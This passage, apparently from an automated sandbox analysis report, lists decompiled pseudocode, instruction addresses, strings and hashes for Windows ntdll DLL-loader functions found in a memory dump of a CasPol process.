										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0161BB40(_t257,  &_v68, _t243);
								if(L015E43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01621370(_t278, 0x15b4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L015F4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0161F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01621370(_v16, 0x15b4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0161BB40(_t262,  &_v68, _t244);
								if(L015E43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01621370(_t282, 0x15b4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0161BB40(_t262,  &_v68, _t201);
							if(L015E43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L015F4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0161F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01621370(_t280, 0x15b4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0161BB40(_t267,  &_v68, _t245);
							if(L015E43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01621370(_t284, 0x15b4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0161BB40(_t267,  &_v68, _t224);
						if(L015E43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x015e3d3c
0x015e3d42
0x015e3d44
0x015e3d46
0x015e3d49
0x015e3d4c
0x015e3d4f
0x015e3d52
0x015e3d55
0x015e3d58
0x015e3d5b
0x015e3d5f
0x015e3d61
0x015e3d66
0x01638213
0x01638218
0x015e4085
0x015e4088
0x015e408e
0x015e4094
0x015e409a
0x015e40a0
0x015e40a6
0x015e40a9
0x015e40af
0x015e40b6
0x015e40bd
0x015e40bd
0x015e3d83
0x0163821f
0x01638229
0x01638238
0x01638238
0x0163823d
0x0163823d
0x015e3da0
0x015e3daf
0x015e3db5
0x015e3dba
0x015e3dba
0x015e3dd4
0x015e3e94
0x015e3eab
0x015e3f6d
0x015e3f84
0x015e406b
0x015e406b
0x015e406e
0x015e406e
0x015e4070
0x015e4074
0x01638351
0x01638351
0x015e407a
0x015e407f
0x0163835d
0x01638370
0x01638377
0x01638379
0x0163837c
0x0163837c
0x0163835d
0x00000000
0x015e407f
0x015e3f8a
0x015e3f8d
0x015e3f90
0x015e3f95
0x0163830d
0x0163830f
0x015e3f9b
0x015e3fac
0x015e3fae
0x015e3fb1
0x015e3fb1
0x015e3fb6
0x01638317
0x0163831a
0x00000000
0x015e3fbc
0x015e3fc1
0x015e3fc9
0x015e3fd7
0x015e3fda
0x015e3fdd
0x015e4021
0x015e4021
0x015e4029
0x015e4030
0x015e4044
0x015e4046
0x015e4046
0x015e4044
0x015e4049
0x01638327
0x01638334
0x01638339
0x0163833c
0x015e404f
0x015e404f
0x015e404f
0x015e4051
0x015e4056
0x015e4063
0x015e4063
0x015e4068
0x00000000
0x015e4068
0x015e3fdf
0x015e3fe2
0x015e3fe4
0x015e3fe7
0x015e3fef
0x015e4003
0x015e4005
0x015e4005
0x015e400c
0x015e4013
0x015e4016
0x015e4017
0x015e401b
0x015e401e
0x00000000
0x015e401e
0x015e3fb6
0x015e3eb1
0x015e3eb4
0x015e3eb7
0x015e3ebc
0x016382a9
0x016382ab
0x015e3ec2
0x015e3ed3
0x015e3ed5
0x015e3ed8
0x015e3ed8
0x015e3edd
0x016382b3
0x016382b6
0x00000000
0x015e3ee3
0x015e3ee8
0x015e3eed
0x015e3ef0
0x015e3ef3
0x015e3f02
0x015e3f05
0x015e3f08
0x016382c0
0x016382c3
0x016382c5
0x016382c8
0x016382d0
0x016382e4
0x016382e6
0x016382e6
0x016382ed
0x016382f4
0x016382f7
0x016382f8
0x016382fc
0x016382ff
0x016382ff
0x015e3f0e
0x015e3f11
0x015e3f16
0x015e3f1d
0x015e3f31
0x01638307
0x01638307
0x015e3f31
0x015e3f39
0x015e3f48
0x015e3f4d
0x015e3f50
0x015e3f50
0x015e3f53
0x015e3f58
0x015e3f65
0x015e3f65
0x015e3f6a
0x00000000
0x015e3f6a
0x015e3edd
0x015e3dda
0x015e3ddd
0x015e3de0
0x015e3de5
0x01638245
0x015e3deb
0x015e3df7
0x015e3dfc
0x015e3dfe
0x015e3e01
0x015e3e01
0x015e3e06
0x0163824d
0x0163824f
0x01638254
0x00000000
0x015e3e0c
0x015e3e11
0x015e3e16
0x015e3e19
0x015e3e29
0x015e3e2c
0x015e3e2f
0x0163825c
0x0163825f
0x01638261
0x01638264
0x0163826c
0x01638280
0x01638282
0x01638282
0x01638289
0x01638290
0x01638293
0x01638294
0x01638298
0x0163829b
0x0163829b
0x015e3e35
0x015e3e38
0x015e3e3d
0x015e3e44
0x015e3e58
0x016382a3
0x016382a3
0x015e3e58
0x015e3e60
0x015e3e6f
0x015e3e74
0x015e3e77
0x015e3e77
0x015e3e7a
0x015e3e7f
0x015e3e8c
0x015e3e8c
0x015e3e91
0x00000000
0x015e3e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 015E3E97
Kernel-MUI-Language-SKU, xrefs: 015E3F70
WindowsExcludedProcs, xrefs: 015E3D6F
Kernel-MUI-Language-Allowed, xrefs: 015E3DC0
Kernel-MUI-Number-Allowed, xrefs: 015E3D8C

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 37e5aa830e47225a08afd4ab42e1a4d8f823b059df4fd269f73579cb65808140
Instruction ID: 89fc203c867ba29e71e8d83176fede2edbe343ac7942902cc6c17a6de6cff4f5
Opcode Fuzzy Hash: 37e5aa830e47225a08afd4ab42e1a4d8f823b059df4fd269f73579cb65808140
Instruction Fuzzy Hash: E7F13A72D0061AEFCB15DF98C984AEEBBF9FF48650F14456AE505EB211E7349E01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01608E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01608E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x16cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x16c8464; // 0x74cc0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x16c5780 & 0x00000003) != 0) {
							E01655510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x16c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0161B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x16c7984; // 0x1172bb0
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x16c8464; // 0x74cc0110
					 *0x16cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01609B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x16c5780 & 0x00000005) != 0) {
						_push(_t49);
						E01655510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01608e0f
0x01608e16
0x01608e19
0x01608e1b
0x01608e21
0x01608e7f
0x01608e85
0x01649354
0x0164936c
0x01649371
0x0164937b
0x01649381
0x01649381
0x0164937b
0x01608e9d
0x01608e9d
0x01608e29
0x01608e2c
0x01608e38
0x01608e3e
0x01608e43
0x01608eb5
0x01608eb9
0x016492aa
0x016492af
0x016492e8
0x016492e8
0x016492af
0x01608eb9
0x01608e45
0x01608e53
0x01608e5b
0x01608e5f
0x01608e78
0x01608e78
0x01608e7d
0x01608ec3
0x01608ecd
0x01608ed2
0x01608ed2
0x01608ec5
0x01608ec5
0x00000000
0x01608e7d
0x01608e67
0x01608ea4
0x0164931a
0x00000000
0x00000000
0x01649320
0x01608ea4
0x01608e70
0x01649325
0x01649340
0x01649345
0x01649345
0x01608e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0164932A
LdrpFindDllActivationContext, xrefs: 01649331, 0164935D
minkernel\ntdll\ldrsnap.c, xrefs: 0164933B, 01649367
Querying the active activation context failed with status 0x%08lx, xrefs: 01649357

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f15082f51ea074bc64aa30c1dccfd7cad70f6dbe43d3595ccc0097de945fc5fe
Instruction ID: 50f647b813183381e3b4595331ed6f22a53bee5ba800a146a2ed7b4cf7d09a61
Opcode Fuzzy Hash: f15082f51ea074bc64aa30c1dccfd7cad70f6dbe43d3595ccc0097de945fc5fe
Instruction Fuzzy Hash: BD412931E003159FDB3FEA1C8C8DA77BBADBB45358F09456AE904572D2E7706C808381

Uniqueness

Uniqueness Score: -1.00%

Function 015E8794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E015E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E015E934A() != 0) {
								_t159 = E0165A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x16c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01655510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x16c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E015E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E015E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E015E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x16c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x16c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E015F2280(_t92, 0x16c86cc);
															_t94 = E016A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E016061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x16c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E015E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x16c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x16c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0161F380(_t136, 0x15b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E015F2280(_t108, 0x16c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E016061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E016A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E015EFFB0(_t118, _t156, 0x16c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01619A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x015e8799
0x015e879d
0x015e87a1
0x015e87a3
0x015e87a8
0x015e87c3
0x015e87c3
0x015e87c8
0x015e87d1
0x015e87d4
0x015e87d8
0x015e87e5
0x015e87ec
0x01639bfe
0x01639c00
0x01639c02
0x01639c08
0x01639c0d
0x01639c0f
0x01639c14
0x01639c2d
0x01639c32
0x01639c37
0x01639c3a
0x01639c3c
0x01639c42
0x01639c42
0x01639c3c
0x01639c02
0x015e87da
0x015e87df
0x015e87e3
0x00000000
0x00000000
0x015e87e3
0x015e87f2
0x00000000
0x015e87fb
0x015e87fd
0x015e87fe
0x015e880e
0x015e880f
0x015e8810
0x015e8814
0x015e881a
0x015e881c
0x015e881f
0x015e8821
0x015e8822
0x015e8824
0x015e8826
0x015e882c
0x015e882e
0x01639c48
0x01639c48
0x015e8834
0x015e8834
0x015e8837
0x00000000
0x00000000
0x015e8837
0x015e882e
0x015e883d
0x015e8840
0x015e8843
0x015e8846
0x015e8849
0x015e884c
0x015e884e
0x015e8850
0x015e8852
0x015e8854
0x015e8857
0x015e88b4
0x015e88b6
0x015e88b6
0x015e8859
0x015e8859
0x015e8859
0x015e8861
0x015e8866
0x015e886a
0x015e893d
0x015e8941
0x00000000
0x015e8947
0x015e8947
0x015e894a
0x015e894c
0x00000000
0x015e8952
0x015e8955
0x015e895a
0x015e895d
0x015e895d
0x015e895f
0x015e8961
0x015e8961
0x015e8968
0x00000000
0x00000000
0x015e896a
0x015e896b
0x015e896e
0x00000000
0x015e8970
0x015e8970
0x015e8970
0x015e8970
0x015e8972
0x015e8972
0x015e8974
0x00000000
0x015e897a
0x015e897a
0x015e897d
0x00000000
0x015e8983
0x01639c65
0x01639c6d
0x01639c72
0x01639c75
0x01639c75
0x01639c82
0x01639c86
0x01639c87
0x01639c88
0x01639c89
0x01639c8c
0x01639c90
0x01639c95
0x01639c97
0x01639ca0
0x01639ca3
0x01639ca9
0x01639ca9
0x00000000
0x01639ca9
0x01639ca3
0x00000000
0x01639c97
0x015e897d
0x00000000
0x015e8974
0x015e8988
0x015e8992
0x015e8996
0x00000000
0x015e8996
0x015e894c
0x00000000
0x015e8870
0x015e887b
0x015e887d
0x015e887f
0x015e8881
0x015e8884
0x015e8884
0x015e8886
0x015e8889
0x015e888c
0x015e888e
0x015e8891
0x015e8891
0x015e8898
0x00000000
0x00000000
0x015e889a
0x015e889b
0x015e889e
0x00000000
0x00000000
0x015e88a0
0x015e88a8
0x015e88b0
0x015e88b2
0x015e88d3
0x015e88d5
0x00000000
0x015e88d7
0x015e88db
0x015e88dc
0x015e88e0
0x015e88e8
0x015e88ee
0x015e88f0
0x015e88f3
0x015e88fc
0x015e8901
0x015e8906
0x015e890c
0x015e890c
0x015e890f
0x015e8916
0x015e8917
0x015e8918
0x015e8919
0x015e891a
0x015e891f
0x015e8921
0x01639c52
0x01639c55
0x01639c5b
0x01639cac
0x01639cc0
0x01639cc0
0x01639c55
0x015e8927
0x015e8927
0x015e892f
0x015e8933
0x00000000
0x015e88f5
0x015e88f5
0x00000000
0x015e88f7
0x015e88f7
0x015e88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x015e88fa
0x015e88f5
0x015e88f3
0x00000000
0x015e88d5
0x00000000
0x015e88b2
0x015e88c9
0x00000000
0x015e88c9
0x015e887f
0x015e886a
0x015e8857
0x015e8852
0x015e88bf
0x015e88bf
0x015e87aa
0x015e87ad
0x015e87ae
0x015e87b4
0x015e87b5
0x015e87b6
0x015e87b8
0x015e87bd
0x015e87c1
0x015e87f4
0x015e87fa
0x00000000
0x00000000
0x00000000
0x015e87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01639C18
minkernel\ntdll\ldrsnap.c, xrefs: 01639C28
LdrpDoPostSnapWork, xrefs: 01639C1E

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: 6a60ad45cfe83c259e7faeff4a9c2a4b06c65d2062c95db6b772483f281d825b
Instruction ID: ada93feaa86c934aa24c7dd7e28f2edc3c5dc6f637a0eac048146e61c519104e
Opcode Fuzzy Hash: 6a60ad45cfe83c259e7faeff4a9c2a4b06c65d2062c95db6b772483f281d825b
Instruction Fuzzy Hash: E891EE71E002169FEB2CDF59D884ABEB7F6FF84314B184569D905AF241DB70E902CB90

Uniqueness

Uniqueness Score: -1.00%

Function 015E7E41 Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E015E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E015ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E015DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x16c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01655510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x16c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E015F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01657016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E015F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
